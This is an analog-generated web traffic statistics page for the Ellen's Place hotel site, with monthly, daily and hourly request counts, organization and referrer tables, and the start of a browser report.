<?xml version="1.0" encoding="ISO-8859-1"?>
<?xml-stylesheet href="#internalStyle" type="text/css"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
	"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Web Server Statistics for ellensplace.freudenbergleisure.com</title>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
<meta name="robots" content="noindex,nofollow" />
<meta name="generator" content="analog 6.0/Unix" />
<style type="text/css" id="internalStyle">
h2 {
	background-color: #A0C0F0;
	width: 98%;
	padding: 3px 6px;
}
table {
	text-align: right;
	margin-left: 30px;
	background-color: #D0E0F0;
	border-collapse: collapse;
}
th {
	border-bottom: 1px solid #404050;
	border-right: 1px dotted #606070;
	border-top: none;
	border-left: none;
	padding: 0px 5px 1px 5px;
	font-weight: bold;
	background-color: #A0C0F0;
}
td {
	padding: 0px 5px 1px 5px;
	border-right: 1px dotted #606070;
	border-left: none;
	border-bottom: none;
	border-top:none;
}
td.x {
	font-family: monospace;
	white-space: pre;
}
.xl {
	text-align: left;
	border-right: none;
}
.xr {
	text-align: right;
	border-right: none;
}
.bar {
	text-align: left;
	border-right: none;
}
tr.sub {background-color: #C0C0FF;
	font-style: italic;
}
.repdesc {
	font-style: italic;
}
.repspan {
	font-style: italic;
}
.goto {
	font-size: small;
}
.gensumtitle {
	font-weight: bold;
}
.gototitle {
	font-weight: bold;
}
.runtimetitle {
	font-weight: bold;
}
img {
	border-style: none;
}
a:link {
	color: blue;
	text-decoration: none;
}
a:visited {
	color: purple;
	text-decoration: none;
}
a:link:hover {
	text-decoration: underline;
}
a:visited:hover {
	text-decoration: underline;
}
a:link:active {
	color: red;
	text-decoration: underline;
}
a:visited:active {
	color: red;
	text-decoration: underline;
}
</style>
</head>
<body>
<div class="header"><h1><a name="Top" id="Top" href="http://www.analog.cx/"><img src="/images/analogo.png" alt="" /></a> Web Server Statistics for <a href="http://ellensplace.freudenbergleisure.com/">ellensplace.freudenbergleisure.com</a></h1>

<p class="analysisspan">Program started on Fri, Nov 30 2018 at  5:42 PM.
<br />Analyzed requests from Wed, Feb 28 2018 at  8:37 PM to Fri, Nov 30 2018 at  5:14 PM (274.86 days).</p>
</div>
<div class="gensum"><h2><a name="gensum" id="gensum">General Summary</a></h2>
<p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | General Summary | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#redirref">Redirected Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p>
<p class="lastseven">Figures in parentheses refer to the 7-day period ending Nov 30 2018 at  5:42 PM.</p>
<p class="gensumlines">
<span class="gensumtitle">Successful requests:</span> 42,549 (696)
<br /><span class="gensumtitle">Average successful requests per day:</span> 154 (99)
<br /><span class="gensumtitle">Successful requests for pages:</span> 9,784 (237)
<br /><span class="gensumtitle">Average successful requests for pages per day:</span> 35 (33)
<br /><span class="gensumtitle">Redirected requests:</span> 14,209 (72)
<br /><span class="gensumtitle">Distinct files requested:</span> 361 (1,812)
<br /><span class="gensumtitle">Distinct hosts served:</span> 5,478 (5,990)
<br /><span class="gensumtitle">Data transferred:</span> 1.61 gigabytes (25.84 megabytes)
<br /><span class="gensumtitle">Average data transferred per day:</span> 6.01 megabytes (3.69 megabytes)
</p>
</div><div class="month"><h2><a name="month" id="month">Monthly Report</a></h2>
<p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | Monthly Report | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#redirref">Redirected Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p>
<p class="eachunit">Each unit (<img src="/images/barb1.png" alt="+" />) represents 50 requests for pages or part thereof.</p>
<table>
<thead><tr><th class="x">month</th><th class="R">#reqs</th><th class="P">#pages</th><th class="bar">&nbsp;</th></tr></thead>
<tbody><tr><td class="x">Feb 2018</td><td class="R">26</td><td class="P">1</td><td class="bar"><img src="/images/barb1.png" alt="+" /></td></tr>
<tr><td class="x">Mar 2018</td><td class="R">4842</td><td class="P">306</td><td class="bar"><img src="/images/barb4.png" alt="+++++++" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr>
<tr><td class="x">Apr 2018</td><td class="R">4414</td><td class="P">294</td><td class="bar"><img src="/images/barb4.png" alt="++++++" /><img src="/images/barb2.png" alt="" /></td></tr>
<tr><td class="x">May 2018</td><td class="R">7195</td><td class="P">1790</td><td class="bar"><img src="/images/barb32.png" alt="++++++++++++++++++++++++++++++++++++" /><img src="/images/barb4.png" alt="" /></td></tr>
<tr><td class="x">Jun 2018</td><td class="R">4493</td><td class="P">1176</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /></td></tr>
<tr><td class="x">Jul 2018</td><td class="R">4705</td><td class="P">1230</td><td class="bar"><img src="/images/barb16.png" alt="+++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr>
<tr><td class="x">Aug 2018</td><td class="R">4899</td><td class="P">1511</td><td class="bar"><img src="/images/barb16.png" alt="+++++++++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /><img src="/images/barb4.png" alt="" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr>
<tr><td class="x">Sep 2018</td><td class="R">4078</td><td class="P">1278</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /><img src="/images/barb2.png" alt="" /></td></tr>
<tr><td class="x">Oct 2018</td><td class="R">4487</td><td class="P">1128</td><td class="bar"><img src="/images/barb16.png" alt="+++++++++++++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr>
<tr><td class="x">Nov 2018</td><td class="R">3410</td><td class="P">1070</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb2.png" alt="" /></td></tr>
</tbody></table>
<p class="busiesttime">Busiest month: May 2018 (1,790 requests for pages).</p>
</div><div class="daysum"><h2><a name="daysum" id="daysum">Daily Summary</a></h2>
<p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | Daily Summary | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#redirref">Redirected Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p>
<p class="eachunit">Each unit (<img src="/images/barb1.png" alt="+" />) represents 40 requests for pages or part thereof.</p>
<table>
<thead><tr><th class="x">day</th><th class="R">#reqs</th><th class="P">#pages</th><th class="bar">&nbsp;</th></tr></thead>
<tbody><tr><td class="x">Sun</td><td class="R">5219</td><td class="P">1088</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /><img src="/images/barb4.png" alt="" /></td></tr>
<tr><td class="x">Mon</td><td class="R">5860</td><td class="P">1490</td><td class="bar"><img src="/images/barb32.png" alt="++++++++++++++++++++++++++++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb2.png" alt="" /></td></tr>
<tr><td class="x">Tue</td><td class="R">6250</td><td class="P">1325</td><td class="bar"><img src="/images/barb32.png" alt="++++++++++++++++++++++++++++++++++" /><img src="/images/barb2.png" alt="" /></td></tr>
<tr><td class="x">Wed</td><td class="R">7326</td><td class="P">1556</td><td class="bar"><img src="/images/barb32.png" alt="+++++++++++++++++++++++++++++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr>
<tr><td class="x">Thu</td><td class="R">6596</td><td class="P">1574</td><td class="bar"><img src="/images/barb32.png" alt="++++++++++++++++++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /></td></tr>
<tr><td class="x">Fri</td><td class="R">5996</td><td class="P">1506</td><td class="bar"><img src="/images/barb32.png" alt="++++++++++++++++++++++++++++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb2.png" alt="" /></td></tr>
<tr><td class="x">Sat</td><td class="R">5302</td><td class="P">1245</td><td class="bar"><img src="/images/barb32.png" alt="++++++++++++++++++++++++++++++++" /></td></tr>
</tbody></table>
</div><div class="hoursum"><h2><a name="hoursum" id="hoursum">Hourly Summary</a></h2>
<p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | Hourly Summary | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#redirref">Redirected Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p>
<p class="eachunit">Each unit (<img src="/images/barb1.png" alt="+" />) represents 15 requests for pages or part thereof.</p>
<table>
<thead><tr><th class="x">hour</th><th class="R">#reqs</th><th class="P">#pages</th><th class="bar">&nbsp;</th></tr></thead>
<tbody><tr><td class="x"> 0</td><td class="R">1119</td><td class="P">320</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb2.png" alt="" /></td></tr>
<tr><td class="x"> 1</td><td class="R">1412</td><td class="P">325</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb2.png" alt="" /></td></tr>
<tr><td class="x"> 2</td><td class="R">1489</td><td class="P">261</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++++" /><img src="/images/barb2.png" alt="" /></td></tr>
<tr><td class="x"> 3</td><td class="R">1560</td><td class="P">324</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb2.png" alt="" /></td></tr>
<tr><td class="x"> 4</td><td class="R">1184</td><td class="P">275</td><td class="bar"><img src="/images/barb16.png" alt="+++++++++++++++++++" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr>
<tr><td class="x"> 5</td><td class="R">1271</td><td class="P">252</td><td class="bar"><img src="/images/barb16.png" alt="+++++++++++++++++" /><img src="/images/barb1.png" alt="" /></td></tr>
<tr><td class="x"> 6</td><td class="R">1341</td><td class="P">335</td><td class="bar"><img src="/images/barb16.png" alt="+++++++++++++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr>
<tr><td class="x"> 7</td><td class="R">1558</td><td class="P">335</td><td class="bar"><img src="/images/barb16.png" alt="+++++++++++++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr>
<tr><td class="x"> 8</td><td class="R">1437</td><td class="P">366</td><td class="bar"><img src="/images/barb16.png" alt="+++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr>
<tr><td class="x"> 9</td><td class="R">1363</td><td class="P">437</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /><img src="/images/barb4.png" alt="" /><img src="/images/barb2.png" alt="" /></td></tr>
<tr><td class="x">10</td><td class="R">2233</td><td class="P">486</td><td class="bar"><img src="/images/barb32.png" alt="+++++++++++++++++++++++++++++++++" /><img src="/images/barb1.png" alt="" /></td></tr>
<tr><td class="x">11</td><td class="R">2139</td><td class="P">560</td><td class="bar"><img src="/images/barb32.png" alt="++++++++++++++++++++++++++++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb2.png" alt="" /></td></tr>
<tr><td class="x">12</td><td class="R">2749</td><td class="P">557</td><td class="bar"><img src="/images/barb32.png" alt="++++++++++++++++++++++++++++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb2.png" alt="" /></td></tr>
<tr><td class="x">13</td><td class="R">2389</td><td class="P">590</td><td class="bar"><img src="/images/barb32.png" alt="++++++++++++++++++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /></td></tr>
<tr><td class="x">14</td><td class="R">2098</td><td class="P">501</td><td class="bar"><img src="/images/barb32.png" alt="++++++++++++++++++++++++++++++++++" /><img src="/images/barb2.png" alt="" /></td></tr>
<tr><td class="x">15</td><td class="R">2213</td><td class="P">503</td><td class="bar"><img src="/images/barb32.png" alt="++++++++++++++++++++++++++++++++++" /><img src="/images/barb2.png" alt="" /></td></tr>
<tr><td class="x">16</td><td class="R">2524</td><td class="P">498</td><td class="bar"><img src="/images/barb32.png" alt="++++++++++++++++++++++++++++++++++" /><img src="/images/barb2.png" alt="" /></td></tr>
<tr><td class="x">17</td><td class="R">1878</td><td class="P">457</td><td class="bar"><img src="/images/barb16.png" alt="+++++++++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /><img src="/images/barb4.png" alt="" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr>
<tr><td class="x">18</td><td class="R">1600</td><td class="P">442</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /><img src="/images/barb4.png" alt="" /><img src="/images/barb2.png" alt="" /></td></tr>
<tr><td class="x">19</td><td class="R">1671</td><td class="P">449</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /><img src="/images/barb4.png" alt="" /><img src="/images/barb2.png" alt="" /></td></tr>
<tr><td class="x">20</td><td class="R">2294</td><td class="P">417</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /><img src="/images/barb4.png" alt="" /></td></tr>
<tr><td class="x">21</td><td class="R">1688</td><td class="P">406</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /><img src="/images/barb4.png" alt="" /></td></tr>
<tr><td class="x">22</td><td class="R">1653</td><td class="P">353</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /></td></tr>
<tr><td class="x">23</td><td class="R">1686</td><td class="P">335</td><td class="bar"><img src="/images/barb16.png" alt="+++++++++++++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr>
</tbody></table>
</div><div class="dom"><h2><a name="dom" id="dom">Domain Report</a></h2>
<p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | Domain Report | <a href="#org">Organization Report</a> | <a href="#redirref">Redirected Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p>
<p class="whatinc">
Listing domains, sorted by the amount of traffic.</p>
<table>
<thead><tr><th class="R">#reqs</th><th class="b">%bytes</th><th class="xl">domain</th></tr></thead>
<tbody><tr><td class="R">42549</td><td class="b">100%</td><td class="xl">[unresolved numerical addresses]</td></tr>
</tbody></table>
</div><div class="org"><h2><a name="org" id="org">Organization Report</a></h2>
<p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | Organization Report | <a href="#redirref">Redirected Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p>
<p><img src="./org.png" alt="" /></p>
<p class="whatinc">
Listing organizations, sorted by the number of requests.</p>
<table>
<thead><tr><th class="R">#reqs</th><th class="b">%bytes</th><th class="xl">organization</th></tr></thead>
<tbody><tr><td class="R">11934</td><td class="b">27.52%</td><td class="xl">162.158</td></tr>
<tr><td class="R">10761</td><td class="b">22.49%</td><td class="xl">172.68</td></tr>
<tr><td class="R">6072</td><td class="b">17.08%</td><td class="xl">172.31</td></tr>
<tr><td class="R">4564</td><td class="b">10.18%</td><td class="xl">108</td></tr>
<tr><td class="R">3653</td><td class="b"> 8.35%</td><td class="xl">172.69</td></tr>
<tr><td class="R">2871</td><td class="b"> 7.88%</td><td class="xl">141.101</td></tr>
<tr><td class="R">1741</td><td class="b"> 4.07%</td><td class="xl">10</td></tr>
<tr><td class="R">457</td><td class="b"> 0.79%</td><td class="xl">173.245</td></tr>
<tr><td class="R">167</td><td class="b"> 0.53%</td><td class="xl">197.234</td></tr>
<tr><td class="R">131</td><td class="b"> 0.42%</td><td class="xl">188.114</td></tr>
<tr><td class="R">109</td><td class="b"> 0.26%</td><td class="xl">198.41</td></tr>
<tr><td class="R">89</td><td class="b"> 0.41%</td><td class="xl">103</td></tr>
</tbody></table>
</div><div class="redirref"><h2><a name="redirref" id="redirref">Redirected Referrer Report</a></h2>
<p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | Redirected Referrer Report | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p>
<p><img src="./redirref.png" alt="" /></p>
<p class="whatinc">
Listing the top 30 referring URLs by the number of redirected requests, sorted by the number of redirected requests.</p>
<table>
<thead><tr><th class="R">#reqs</th><th class="xl">URL</th></tr></thead>
<tbody><tr><td class="R">446</td><td class="xl"><a href="https://ellensplace.freudenbergleisure.com/assets/css/ellens_main.css">https://ellensplace.freudenbergleisure.com/assets/css/ellens_main.css</a></td></tr>
<tr><td class="R">276</td><td class="xl"><a href="https://ellensplace.freudenbergleisure.com/about-us">https://ellensplace.freudenbergleisure.com/about-us</a></td></tr>
<tr><td class="R">234</td><td class="xl"><a href="https://ellensplace.freudenbergleisure.com/">https://ellensplace.freudenbergleisure.com/</a></td></tr>
<tr><td class="R">220</td><td class="xl"><a href="https://ellensplace.freudenbergleisure.com/assets/css/jquery-ui.css">https://ellensplace.freudenbergleisure.com/assets/css/jquery-ui.css</a></td></tr>
<tr><td class="R">135</td><td class="xl"><a href="https://ellensplace.freudenbergleisure.com/gallery">https://ellensplace.freudenbergleisure.com/gallery</a></td></tr>
<tr><td class="R">93</td><td class="xl"><a href="http://ellens-place.com/">http://ellens-place.com/</a></td></tr>
<tr><td class="R">90</td><td class="xl"><a href="http://ellensplace.lk/">http://ellensplace.lk/</a></td></tr>
<tr><td class="R">51</td><td class="xl"><a href="http://ellens-place.com/wp-login.php">http://ellens-place.com/wp-login.php</a></td></tr>
<tr><td class="R">51</td><td class="xl"><a href="http://ellensplace.lk/wp-login.php">http://ellensplace.lk/wp-login.php</a></td></tr>
<tr><td class="R">47</td><td class="xl"><a href="http://www.ellensplace.lk/">http://www.ellensplace.lk/</a></td></tr>
<tr><td class="R">37</td><td class="xl"><a href="https://ellensplace.freudenbergleisure.com/accommodation/standard-rooms">https://ellensplace.freudenbergleisure.com/accommodation/standard-rooms</a></td></tr>
<tr><td class="R">28</td><td class="xl"><a href="https://ellensplace.freudenbergleisure.com/accommodation/super-deluxe-rooms">https://ellensplace.freudenbergleisure.com/accommodation/super-deluxe-rooms</a></td></tr>
<tr><td class="R">28</td><td class="xl"><a href="https://ellensplace.freudenbergleisure.com/accommodation/deluxe-rooms">https://ellensplace.freudenbergleisure.com/accommodation/deluxe-rooms</a></td></tr>
<tr><td class="R">24</td><td class="xl"><a href="https://ellensplace.freudenbergleisure.com/suites.php">https://ellensplace.freudenbergleisure.com/suites.php</a></td></tr>
<tr><td class="R">20</td><td class="xl"><a href="https://ellensplace.freudenbergleisure.com/facilities/restaurant">https://ellensplace.freudenbergleisure.com/facilities/restaurant</a></td></tr>
<tr><td class="R">14</td><td class="xl"><a href="http://www.ellens-place.com/about-us.php">http://www.ellens-place.com/about-us.php</a></td></tr>
<tr><td class="R">12</td><td class="xl"><a href="https://ellensplace.freudenbergleisure.com/ipms247.php">https://ellensplace.freudenbergleisure.com/ipms247.php</a></td></tr>
<tr><td class="R">11</td><td class="xl"><a href="http://ellens-place.com/sites/all/libraries/elfinder/connectors/php/connector.php">http://ellens-place.com/sites/all/libraries/elfinder/connectors/php/connector.php</a></td></tr>
<tr><td class="R">11</td><td class="xl"><a href="http://ellensplace.freudenbergleisure.com/sites/all/libraries/elfinder/connectors/php/connector.php">http://ellensplace.freudenbergleisure.com/sites/all/libraries/elfinder/connectors/php/connector.php</a></td></tr>
<tr><td class="R">10</td><td class="xl"><a href="https://google.com/">https://google.com/</a></td></tr>
<tr><td class="R">10</td><td class="xl"><a href="http://ellensplace.freudenbergleisure.com/sites/all/libraries/elfinder/src/connectors/php/connector.php">http://ellensplace.freudenbergleisure.com/sites/all/libraries/elfinder/src/connectors/php/connector.php</a></td></tr>
<tr><td class="R">9</td><td class="xl"><a href="http://www.google.com.hk/">http://www.google.com.hk/</a></td></tr>
<tr><td class="R">9</td><td class="xl"><a href="https://ellensplace.freudenbergleisure.com/facilities/swimming-pool">https://ellensplace.freudenbergleisure.com/facilities/swimming-pool</a></td></tr>
<tr><td class="R">8</td><td class="xl"><a href="https://ellensplace.freudenbergleisure.com/accommodation/suites">https://ellensplace.freudenbergleisure.com/accommodation/suites</a></td></tr>
<tr><td class="R">8</td><td class="xl"><a href="http://ellensplace.freudenbergleisure.com/sites/all/libraries/elfinder/elfinder.html">http://ellensplace.freudenbergleisure.com/sites/all/libraries/elfinder/elfinder.html</a></td></tr>
<tr><td class="R">8</td><td class="xl"><a href="https://ellensplace.freudenbergleisure.com/swimming-pool.php">https://ellensplace.freudenbergleisure.com/swimming-pool.php</a></td></tr>
<tr><td class="R">8</td><td class="xl"><a href="http://ellensplace.freudenbergleisure.com/login.action">http://ellensplace.freudenbergleisure.com/login.action</a></td></tr>
<tr><td class="R">7</td><td class="xl"><a href="http://ellensplace.lk/gags/index.html">http://ellensplace.lk/gags/index.html</a></td></tr>
<tr><td class="R">7</td><td class="xl"><a href="http://ellens-place.com/sites/all/libraries/elfinder/elfinder.html">http://ellens-place.com/sites/all/libraries/elfinder/elfinder.html</a></td></tr>
<tr><td class="R">6</td><td class="xl"><a href="http://ellens-place.com/sites/all/libraries/elfinder/src/connectors/php/connector.php">http://ellens-place.com/sites/all/libraries/elfinder/src/connectors/php/connector.php</a></td></tr>
<tr><td class="R">507</td><td class="xl">[not listed: 350 URLs]</td></tr>
</tbody></table>
</div><div class="refsite"><h2><a name="refsite" id="refsite">Referring Site Report</a></h2>
<p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#redirref">Redirected Referrer Report</a> | Referring Site Report | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p>
<p><img src="./refsite.png" alt="" /></p>
<p class="whatinc">
Listing the top 30 referring sites by the number of requests, sorted by the number of requests.</p>
<table>
<thead><tr><th class="R">#reqs</th><th class="xl">site</th></tr></thead>
<tbody><tr><td class="R">10457</td><td class="xl">http://www.ellensplace.lk/</td></tr>
<tr><td class="R">8837</td><td class="xl">https://ellensplace.freudenbergleisure.com/</td></tr>
<tr><td class="R">2126</td><td class="xl">http://ellensplace.lk/</td></tr>
<tr><td class="R">905</td><td class="xl">https://www.google.lk/</td></tr>
<tr><td class="R">791</td><td class="xl">http://ellens-place.com/</td></tr>
<tr><td class="R">341</td><td class="xl">https://www.google.com/</td></tr>
<tr><td class="R">295</td><td class="xl">http://www.ellens-place.com/</td></tr>
<tr><td class="R">286</td><td class="xl">https://ellensplace.freudenbergleisure.lk/</td></tr>
<tr><td class="R">277</td><td class="xl">http://www.freudenbergleisure.com/</td></tr>
<tr><td class="R">236</td><td class="xl">http://fsalk.com/</td></tr>
<tr><td class="R">172</td><td class="xl">http://www.fsalk.com/</td></tr>
<tr><td class="R">122</td><td class="xl">http://freudenbergleisure.lk/</td></tr>
<tr><td class="R">117</td><td class="xl">http://ellensplace.freudenbergleisure.com/</td></tr>
<tr><td class="R">104</td><td class="xl">https://ellens-place.com/</td></tr>
<tr><td class="R">104</td><td class="xl">https://www.freudenbergleisure.lk/</td></tr>
<tr><td class="R">101</td><td class="xl">https://www.fsalk.com/</td></tr>
<tr><td class="R">98</td><td class="xl">https://ellensplace.lk/</td></tr>
<tr><td class="R">94</td><td class="xl">https://fsalk.com/</td></tr>
<tr><td class="R">89</td><td class="xl">https://www.ellensplace.lk/</td></tr>
<tr><td class="R">83</td><td class="xl">https://www.ellens-place.com/</td></tr>
<tr><td class="R">75</td><td class="xl">http://fsaleisure.com/</td></tr>
<tr><td class="R">75</td><td class="xl">http://www.freudenbergleisure.lk/</td></tr>
<tr><td class="R">73</td><td class="xl">https://www.google.co.in/</td></tr>
<tr><td class="R">70</td><td class="xl">http://freudenbergleisure.com/</td></tr>
<tr><td class="R">64</td><td class="xl">http://www.fsaleisure.com/</td></tr>
<tr><td class="R">60</td><td class="xl">https://freudenbergleisure.lk/</td></tr>
<tr><td class="R">49</td><td class="xl">http://www.google.com/</td></tr>
<tr><td class="R">44</td><td class="xl">https://translate.googleusercontent.com/</td></tr>
<tr><td class="R">44</td><td class="xl">https://fsaleisure.com/</td></tr>
<tr><td class="R">36</td><td class="xl">https://freudenbergleisure.com/</td></tr>
<tr><td class="R">821</td><td class="xl">[not listed: 214 sites]</td></tr>
</tbody></table>
</div><div class="browrep"><h2><a name="browrep" id="browrep">Browser Report</a></h2>
<p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#redirref">Redirected Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | Browser Report | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p>
<p><img src="./browrep.png" alt="" /></p>
<p class="whatinc">
Listing the top 40 browsers by the number of requests for pages, sorted by the number of requests for pages.</p>
<table>
<thead><tr><th class="R">#reqs</th><th class="P">#pages</th><th class="xl">browser</th></tr></thead>
<tbody><tr><td class="R">641</td><td class="P">641</td><td class="xl">Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1</td></tr>
<tr><td class="R">1024</td><td class="P">638</td><td class="xl">Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)</td></tr>
<tr><td class="R">1128</td><td class="P">603</td><td class="xl">Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)</td></tr>
